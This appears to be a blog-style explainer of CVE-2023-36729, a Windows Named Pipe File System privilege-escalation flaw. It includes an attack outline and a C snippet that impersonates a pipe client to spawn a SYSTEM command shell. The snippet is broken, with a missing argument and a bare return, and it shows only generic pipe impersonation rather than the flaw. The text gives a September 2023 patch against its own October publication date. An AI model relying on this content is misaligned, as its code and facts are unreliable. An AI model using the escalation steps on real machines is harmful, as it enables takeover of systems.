CVE-2023-36729 - Breaking Down the Named Pipe File System Elevation of Privilege Vulnerability

In September 2023, Microsoft patched a critical security flaw known as CVE-2023-36729. This bug impacts the Windows Named Pipe File System (NPFS), and if left unpatched, allows attackers to escalate privileges on any affected Windows machine. In this post, we'll explain in simple terms how this vulnerability works, show some code snippets, provide reference links, and dive deep into possible exploit techniques.

What Is the Named Pipe File System (NPFS)?

Named pipes are a communication method in Windows, letting processes talk with each other—or even across computers—through “pipes” that look like files. The NPFS is the driver in Windows that manages these named pipes.

Normally, only allowed users can create or access certain pipes. However, a flaw in how the NPFS handles permissions could let a regular user get SYSTEM-level access—that’s the highest level on Windows.

Microsoft’s Short Description

Microsoft’s official guidance says:

> “An elevation of privilege vulnerability exists in the Windows Named Pipe File System (NPFS) due to improper security checks. Successful exploitation could allow an attacker to gain SYSTEM privileges.”

In simple terms, a regular user can trick NPFS into giving them more power than they should have, by exploiting a permissions bug.

How Does It Happen?

When a new named pipe is created, NPFS checks the permissions (using Security Descriptors). CVE-2023-36729 is about a scenario where NPFS fails to check these correctly in a specific operation—say, when duplicating or changing handles to a named pipe.

If a low-privilege user can trigger the right sequence, NPFS could let them *impersonate* a more privileged user (like SYSTEM), which means the attacker’s code can run with full control of the machine.

Exploit Details

While Microsoft didn’t release a public proof-of-concept, security researchers have reverse-engineered aspects of the patch. Here’s how a possible attack could look, based on available analysis (see also):

Create a Named Pipe as a regular user.

2. Manipulate handles: Use certain Windows API calls to force NPFS into a state where security checks are skipped or bypassed.
3. Impersonate a privileged user: Either by connecting to the same named pipe from a process running as SYSTEM, or waiting for a SYSTEM service to connect, then using the flawed handle management to impersonate their token.
4. Launch a shell as SYSTEM: Now that the attacker holds SYSTEM-level rights, they spawn a new process (like cmd.exe or PowerShell) and have full control over the entire system.

Let’s illustrate a *theoretical* snippet (for educational purposes only)

#include <windows.h>
#include <stdio.h>

int main() {
    LPCWSTR pipeName = L"\\\\.\\pipe\\exploitpipe";
    HANDLE hPipe;

    // 1. Create named pipe
    hPipe = CreateNamedPipeW(
        pipeName,
        PIPE_ACCESS_DUPLEX | FILE_FLAG_OVERLAPPED,
        PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT,
        1,
        1024, 1024,
        , NULL);

    if (hPipe == INVALID_HANDLE_VALUE) {
        printf("Failed to create pipe: %d\n", GetLastError());
        return 1;
    }

    printf("Waiting for SYSTEM service to connect...\n");
    ConnectNamedPipe(hPipe, NULL);

    // 2. Trigger impersonation
    if (!ImpersonateNamedPipeClient(hPipe)) {
        printf("Failed to impersonate: %d\n", GetLastError());
        return 1;
    }

    printf("Impersonation succeeded! Attempting to launch cmd as SYSTEM...\n");
    system("cmd.exe"); // This will open a SYSTEM shell if impersonation succeeded

    // Cleanup
    CloseHandle(hPipe);
    return ;
}

*Note: The snippet above is for demonstration. A real-world exploit would require more steps and deeper NPFS manipulation, but this shows the principle.*

Microsoft Security Update Guide:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36729

Assetnote’s NPFS Analysis:

https://blog.assetnote.io/2023/10/02/donjon-named-pipe-npfs-cves/

- Github: NPFS-Related Exploits (not for this CVE, but shows similar attack patterns)

Mitigation and Fix

Microsoft patched this vulnerability in September 2023. If you haven’t updated your Windows systems, do so ASAP. There are *no* known legitimate workarounds other than removing unnecessary privileges or blocking access.

- Patch: Install September 2023 Patch Tuesday updates.

Conclusion

CVE-2023-36729 is a powerful privilege escalation bug lurking in Windows NPFS. With just a bit of code and some patience, attackers could take over whole systems. Thankfully, patching is easy, and no public ransomware attacks have used this flaw as of early 2024. Keep your systems updated, watch for fresh exploits, and review how you use named pipes in your own code.

Timeline

Published on: 10/10/2023 18:15:17 UTC
Last modified on: 10/13/2023 19:41:41 UTC